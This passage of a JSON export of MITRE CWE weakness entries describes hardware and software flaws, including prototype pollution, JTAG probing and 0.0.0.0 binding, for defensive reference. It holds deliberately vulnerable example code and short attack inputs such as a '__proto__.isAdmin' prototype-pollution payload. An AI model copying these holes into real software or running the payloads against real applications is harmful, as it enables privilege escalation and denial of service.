alert, input triggers system shutdown. The alert signal is handled as a General-Purpose-I/O (GPIO) pin in input mode."]},"Example_Code":[{"#text":"The processor-GPIO controller exposes software-programmable controls that allow untrusted software to reprogram the state of the GPIO pin.","attr":{"@_Nature":"bad"}},{"#text":"The GPIO alert-signal pin is blocked from untrusted software access and is controlled only by trusted software, such as the System BIOS.","attr":{"@_Nature":"good"}}],"Body_Text":"Reprogramming the state of the GPIO pin allows malicious software to trigger spurious alerts or to set the alert pin to a zero value so that thermal sensor alerts are not received by the processor."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"}}},"1321":{"attr":{"@_ID":"1321","@_Name":"Improperly Controlled Modification of Object Prototype Attributes (\'Prototype Pollution\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.","Extended_Description":{"xhtml:p":["By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf).","This weakness is usually exploited by using a special attribute of objects called proto,  constructor or prototype. Such attributes give access to the object prototype. This weakness is often found in code that assigns object attributes based on user input, or merges or clones objects recursively."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"915","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Likelihood":"High","Note":"An attacker can inject attributes that are used in other components."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Likelihood":"High","Note":"An attacker can override existing attributes with ones that have incompatible type, which may lead to a crash."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.","Effectiveness":"High","Effectiveness_Notes":"While this can mitigate this weakness completely, other methods are recommended when possible, especially in components used by upstream software (\\"libraries\\")."},{"Phase":"Architecture and Design","Description":"By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.","Effectiveness":"High"},{"Phase":"Implementation","Strategy":"Input Validation","Description":"When handling untrusted objects, validating using a schema can be used.","Effectiveness":"Limited"},{"Phase":"Implementation","Description":"By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This function sets object attributes based on a dot-separated path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":{"#text":"function setValueByPath (object, path, value) {","xhtml:br":"","xhtml:div":{"#text":"const pathArray = path.split(\\".\\");const attributeToSet = pathArray.pop();let objectToModify = object;for (const attr of pathArray) {objectToModify[attributeToSet] = value;return object;}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"if (typeof objectToModify[attr] !== \'object\') {objectToModify = objectToModify[attr];}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"objectToModify[attr] = {};}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":{"#text":"setValueByPath({}, \\"__proto__.isAdmin\\", true)setValueByPath({}, \\"constructor.prototype.isAdmin\\", true)","xhtml:br":["",""]}},{"attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:div":{"#text":"function setValueByPath (object, path, value) {","xhtml:br":"","xhtml:div":{"#text":"const pathArray = path.split(\\".\\");const attributeToSet = pathArray.pop();let objectToModify = object;for (const attr of pathArray) {objectToModify[attributeToSet] = value;return object;}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"if (attr === \\"__proto__\\" || attr === \\"constructor\\" || attr === \\"prototype\\") {if (typeof objectToModify[attr] !== \\"object\\") {objectToModify = objectToModify[attr];}","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"// Ignore attributes which resolve to object prototype","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"continue;}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"objectToModify[attr] = {};}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}}}],"Body_Text":["This function does not check if the attribute resolves to the object prototype. These codes can be used to add \\"isAdmin: true\\" to the object prototype.","By using a denylist of dangerous attributes, this weakness can be eliminated."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-3721","Description":"Prototype pollution by merging objects.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3721"},{"Reference":"CVE-2019-10744","Description":"Prototype pollution by setting default values to object attributes recursively.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10744"},{"Reference":"CVE-2019-11358","Description":"Prototype pollution by merging objects recursively.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11358"},{"Reference":"CVE-2020-8203","Description":"Prototype pollution by setting object attributes based on dot-separated path.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8203"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"77"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1148"}},{"attr":{"@_External_Reference_ID":"REF-1149"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous External Contributor","Submission_Date":"2020-08-25"}}},"1322":{"attr":{"@_ID":"1322","@_Name":"Use of Blocking Code in Single-threaded, Non-blocking Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a non-blocking model that relies on a single threaded process\\n\\t\\t\\tfor features such as scalability, but it contains code that can block when it is invoked.","Extended_Description":{"xhtml:p":["When an attacker can directly invoke the blocking code, or the blocking code can be affected by environmental conditions that can be influenced by an attacker, then this can lead to a denial of service by causing unexpected hang or freeze of the code. Examples of blocking code might be an expensive computation or calling\\n\\t\\t\\t\\tblocking library calls, such as those that perform exclusive file operations or require a successful network operation.","Due to limitations in multi-thread models, single-threaded\\n\\t\\t\\t\\tmodels are used to overcome the resource constraints that are caused by using\\n\\t\\t\\t\\tmany threads. In such a model, all code should generally be\\n\\t\\t\\t\\tnon-blocking. If blocking code is called, then the event loop will\\n\\t\\t\\t\\teffectively be stopped, which can be undesirable or dangerous.  Such\\n\\t\\t\\t\\tmodels are used in Python asyncio, Vert.x, and Node.js, or other\\n\\t\\t\\t\\tcustom event loop code.",""]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"834","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"835","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Note":"An unexpected call to blocking code can trigger an infinite loop, or a large loop that causes the software to pause and wait indefinitely."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Generally speaking, blocking calls should be\\n\\t\\t\\t\\t\\treplaced with non-blocking alternatives that can be used asynchronously.\\n\\t\\t\\t\\t\\tExpensive computations should be passed off to worker threads, although\\n\\t\\t\\t\\t\\tthe correct approach depends on the framework being used."},{"Phase":"Implementation","Description":"For expensive computations, consider breaking them up into\\n\\t\\t\\t\\t\\tmultiple smaller computations. Refer to the documentation of the\\n\\t\\t\\t\\t\\tframework being used for guidance."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"Content_History":{"Submission":{"Submission_Name":"Joe Harvey","Submission_Date":"2019-10-25"}}},"1323":{"attr":{"@_ID":"1323","@_Name":"Improper Management of Sensitive Trace Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Trace data collected from several sources on the\\n                System-on-Chip (SoC) is stored in unprotected locations or\\n                transported to untrusted agents.","Extended_Description":{"xhtml:p":["To facilitate verification of complex System-on-Chip\\n                    (SoC) designs, SoC integrators add specific IP blocks that\\n                    trace the SoC\'s internal signals in real-time. This\\n                    infrastructure enables observability of the SoC\'s internal\\n                    behavior, validation of its functional design,\\n                    and detection of hardware and software bugs. Such tracing\\n                    IP blocks collect traces from several sources on the SoC\\n                    including the CPU, crypto coprocessors, and on-chip fabrics. Traces collected from these sources are then\\n                    aggregated inside trace IP block and forwarded to trace\\n                    sinks, such as debug-trace ports that facilitate debugging by\\n                    external hardware and software debuggers.","Since\\n                    these traces are collected from several security-sensitive\\n                    sources, they must be protected against untrusted\\n                    debuggers. If they are stored in unprotected memory, an\\n                    untrusted software debugger can access these traces and\\n                    extract secret information. Additionally, if\\n                    security-sensitive traces are not tagged as secure, an\\n                    untrusted hardware debugger might access them to extract\\n                    confidential information."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Memory","Note":"An adversary can read secret values if they are captured in debug traces and stored unsafely."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Tag traces to indicate owner and debugging privilege level (designer, OEM, or end user) needed to access that trace."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In a SoC, traces generated from sources\\n                        include security-sensitive IP blocks such as CPU (with\\n                        tracing information such as instructions executed and\\n                        memory operands), on-chip fabric (e.g., memory-transfer\\n                        signals, transaction type and destination, and\\n                        on-chip-firewall-error signals), power-management\\n                        IP blocks (e.g., clock- and power-gating signals), and\\n                        cryptographic coprocessors (e.g., cryptographic keys and\\n                        intermediate values of crypto operations), among\\n                        other non-security-sensitive IP blocks including timers\\n                        and other functional blocks. The collected traces are\\n                        then forwarded to the debug and trace interface used by\\n                        the external hardware debugger.","Example_Code":[{"#text":"The traces do\\n                        not have any privilege level attached to them. All\\n                        collected traces can be viewed by any debugger (i.e., SoC\\n                        designer, OEM debugger, or end user).","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Some of the\\n                        traces are SoC-design-house secrets, while some are OEM\\n                        secrets. Few are end-user secrets and the rest are\\n                        not security-sensitive. Tag all traces with the\\n                        appropriate, privilege level at the source. The bits\\n                        indicating the privilege level must be immutable in\\n                        their transit from trace source to the final, trace\\n                        sink. Debugger privilege level must be checked before\\n                        providing access to traces.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"167"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1150"}},{"attr":{"@_External_Reference_ID":"REF-1151"}}]},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi","Submission_Organization":"The Intel Corporation","Submission_Date":"2020-07-20"}}},"1324":{"attr":{"@_ID":"1324","@_Name":"Sensitive Information Accessible by Physical Probing of JTAG Interface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Sensitive information in clear text on the JTAG\\n                interface may be examined by an eavesdropper, e.g.\\n                by placing a probe device on the interface such as a logic\\n                analyzer, or a corresponding software technique.","Extended_Description":{"xhtml:p":"On a debug configuration with a remote host,\\n                    unbeknownst to the host/user, an attacker with physical\\n                    access to a target system places a probing device on the\\n                    debug interface or software related to the JTAG port e.g.\\n                    device driver. While the authorized host/user performs\\n                    sensitive operations to the target system, the attacker\\n                    uses the probe to collect the JTAG traffic."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"300","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Test/Debug IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"May be introduced when design does not plan for an attacker having physical access while legitimate user is remotely operating device"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Files or Directories","Read Application Data"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Manufacturing","Description":"Disable permanently the JTAG interface before releasing the system to untrusted users.","Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"Encrypt all information (traffic) on the JTAG interface using an approved algorithm (such as recommended by NIST). Encrypt the path from inside the chip to the trusted user application.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Block access to secret data from JTAG.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A TAP accessible register is read/written by a JTAG\\n                        based tool, for internal tool use for an authorized\\n                        user.  The JTAG based tool does not provide access to\\n                        this data to an unauthorized user of the tool.\\n                        However, the user can connect a probing device and\\n                        collect the values directly from the JTAG interface, if\\n                        no additional protections are employed."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"167"}},{"attr":{"@_CAPEC_ID":"545"}}]},"Content_History":{"Submission":{"Submission_Name":"Accellera IP Security Assurance (IPSA) Working Group","Submission_Organization":"Accellera Systems Initiative","Submission_Date":"2020-10-01"}}},"1325":{"attr":{"@_ID":"1325","@_Name":"Improperly Controlled Sequential Memory Allocation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product manages a group of objects or resources and performs a separate memory allocation for each object, but it does not properly limit the total amount of memory that is consumed by all of the combined objects.","Extended_Description":{"xhtml:p":"While the product might limit the amount of memory that is allocated in a single operation for a single object (such as a malloc of an array), if an attacker can cause multiple objects to be allocated in separate operations, then this might cause higher total memory consumption than the developer intended, leading to a denial of service."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"770","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"789","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"476","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Exhaustion","Description":"When a weakness allocates excessive memory on the stack, it is often described as \\"stack exhaustion,\\" which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Memory)","Note":"Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure multiple allocations of the same kind of object are properly tracked - possibly across multiple sessions, requests, or messages. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary."},{"Phase":"Operation","Description":"Run the program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example contains a small allocation of stack memory. When the program was first constructed, the number of times this memory was allocated was probably inconsequential and presented no problem. Over time, as the number of objects in the database grow, the number of allocations will grow - eventually consuming the available stack, i.e. \\"stack exhaustion.\\" An attacker who is able to add elements to the database could cause stack exhaustion more rapidly than assumed by the developer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int end_limit = get_nmbr_obj_from_db();int i;int *base = NULL;int *p =base;for (i = 0; i &lt; end_limit; i++){}","xhtml:i":"// Gets the size from the number of objects in a database, which over time can conceivably get very large","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"*p = alloca(sizeof(int *));p = *p;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// Allocate memory on the stack","// // Point to the next location to be saved"],"xhtml:br":["",""]}}},"Body_Text":"Since this uses alloca(), it allocates memory directly on the stack.  If end_limit is large enough, then the stack can be entirely consumed."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-36049","Description":"JavaScript-based packet decoder uses concatenation of many small strings, causing out-of-memory (OOM) condition","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36049"},{"Reference":"CVE-2019-20176","Description":"Product allocates a new buffer on the stack for each file in a directory, allowing stack exhaustion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20176"},{"Reference":"CVE-2013-1591","Description":"Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"130"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-12-07"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}}},"1326":{"attr":{"@_ID":"1326","@_Name":"Missing Immutable Root of Trust in Hardware","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A missing immutable root of trust in the hardware results in the ability to bypass secure boot or execute untrusted or adversarial boot code.","Extended_Description":{"xhtml:p":["A System-on-Chip (SoC) implements secure boot by verifying or authenticating signed boot code. The signing of the code is achieved by an entity that the SoC trusts.  Before executing the boot code, the SoC verifies that the code or the public key with which the code has been signed has not been tampered with. The other data upon which the SoC depends are system-hardware settings in fuses such as whether \u201cSecure Boot is enabled\u201d. These data play a crucial role in establishing a Root of Trust (RoT) to execute secure-boot flows.","One of the many ways RoT is achieved is by storing the code and data in memory or fuses. This memory should be immutable, i.e., once the RoT is programmed/provisioned in memory, that memory should be locked and prevented from further programming or writes. If the memory contents (i.e., RoT) are mutable, then an adversary can modify the RoT to execute their choice of code, resulting in a compromised secure boot.","Note that, for components like ROM, secure patching/update features should be supported to allow authenticated and authorized updates in the field."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during policy definition, hardware architecture, design, manufacturing, and/or provisioning and can be identified later during testing or system configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Authentication","Authorization"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Modify Memory"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"Automated testing can verify that RoT components are immutable.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Root of trust elements and memory should be part of architecture and design reviews.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting the system, the RoT should be designated for storage in a memory that does not allow further programming/writes."},{"Phase":"Implementation","Description":"During implementation and test, the RoT memory location should be demonstrated to not allow further programming/writes."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The RoT is stored in memory. This memory can be modified by an adversary. For example, if an SoC implements \u201cSecure Boot\u201d by storing the boot code in an off-chip/on-chip flash, the contents of the flash can be modified by using a flash programmer. Similarly, if the boot code is stored in ROM (Read-Only Memory) but the public key or the hash of the public key (used to enable \u201cSecure Boot\u201d) is stored in Flash or a memory that is susceptible to modifications or writes, the implementation is vulnerable.","Body_Text":["In general, if the boot code, key materials and data that enable \u201cSecure Boot\u201d are all mutable, the implementation is vulnerable.","Good architecture defines RoT as immutable in hardware. One of the best ways to achieve immutability is to store boot code, public key or hash of the public key and other relevant data in Read-Only Memory (ROM) or One-Time Programmable (OTP) memory that prevents further programming or writes."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"68"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1152"}},{"attr":{"@_External_Reference_ID":"REF-1153"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"}}},"1327":{"attr":{"@_ID":"1327","@_Name":"Binding to an Unrestricted IP Address","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product assigns the address 0.0.0.0 for a database server, a cloud service/instance, or any computing resource that communicates remotely.","Extended_Description":{"xhtml:p":"When a server binds to the address 0.0.0.0, it allows connections from every IP address on the local machine, effectively exposing the server to every possible network. This might be much broader access than intended by the developer or administrator, who might only be expecting the server to be reachable from a single interface/network."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Client Server","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Cloud Computing","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"System Configuration"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Amplification","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"System Configuration","Description":"Assign IP addresses that are not 0.0.0.0.","Effectiveness":"High"},{"Phase":"System Configuration","Strategy":"Firewall","Description":"Unwanted connections to the configured server may be denied through a firewall or other packet filtering measures.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code snippet uses 0.0.0.0 in a Puppet script.","Example_Code":[{"#text":"signingserver::instance {","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:br":"","xhtml:div":{"#text":"\\"nightly-key-signing-server\\":}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"listenaddr     =&gt; \\"0.0.0.0\\",port           =&gt; \\"9100\\",code_tag       =&gt; \\"SIGNING_SERVER\\",","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":""}},{"#text":"signingserver::instance {","attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:br":"","xhtml:div":{"#text":"\\"nightly-key-signing-server\\":}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"listenaddr     =&gt; \\"127.0.0.1\\",port           =&gt; \\"9100\\",code_tag       =&gt; \\"SIGNING_SERVER\\",","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":""}}],"Body_Text":"The Puppet code snippet is used to provision a signing server that will use 0.0.0.0 to accept traffic. However, as 0.0.0.0 is unrestricted, malicious users may use this IP address to launch frequent requests and cause denial of service attacks."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1158"}},{"attr":{"@_External_Reference_ID":"REF-1159"}}]},"Content_History":{"Submission":{"Submission_Name":"Akond Rahman","Submission_Organization":"Tennessee Technological University","Submission_Date":"2020-09-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}}},"1328":{"attr":{"@_ID":"1328","@_Name":"Security Version Number Mutable to Older Versions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Security-version number in hardware is mutable, resulting in the ability to downgrade (roll-back) the boot firmware to vulnerable code versions.","Extended_Description":{"xhtml:p":["A System-on-Chip (SoC) implements secure boot or verified boot. It might support a security version number, which prevents downgrading the current firmware to a vulnerable version. Once downgraded to a previous version, an adversary can launch exploits on the SoC and thus compromise the security of the SoC. These downgrade attacks are also referred to as roll-back attacks.","The security version number must be stored securely and persistently across power-on resets. A common weakness is that the security version number is modifiable by an adversary, allowing roll-back or downgrade attacks or, under certain circumstances, preventing upgrades (i.e. Denial-of-Service on upgrades). In both cases, the SoC is in a vulnerable state."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"757","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware architecture and design, and can be identified later during testing or system configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Authentication","Authorization"],"Impact":"Other","Likelihood":"High","Note":"Impact includes roll-back or downgrade to a vulnerable version of the firmware or DoS (prevent upgrades)."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"Mutability of stored security version numbers and programming with older firmware images should be part of automated testing.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Anti-roll-back features should be reviewed as part of Architecture or Design review.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting the system, security version data should be designated for storage in registers that are either read-only or have access controls that prevent modification by an untrusted agent."},{"Phase":"Implementation","Description":"During implementation and test, security version data should be demonstrated to be read-only and access controls should be validated."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A new version of firmware is signed with a security version number higher than the previous version. During the firmware update process the SoC checks for the security version number and upgrades the SoC firmware with the latest version. This security version number is stored in persistent memory upon successful upgrade for use across power-on resets.","Body_Text":["In general, if the security version number is mutable, the implementation is vulnerable. A mutable security version number allows an adversary to change the security version to a lower value to allow roll-back or to a higher value to prevent future upgrades.","The security version number should be stored in immutable hardware such as fuses, and the writes to these fuses should be highly access-controlled with appropriate authentication and authorization protections."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"176"}}},"Content_History":{"Submission":{"Submission_Name":"Arun 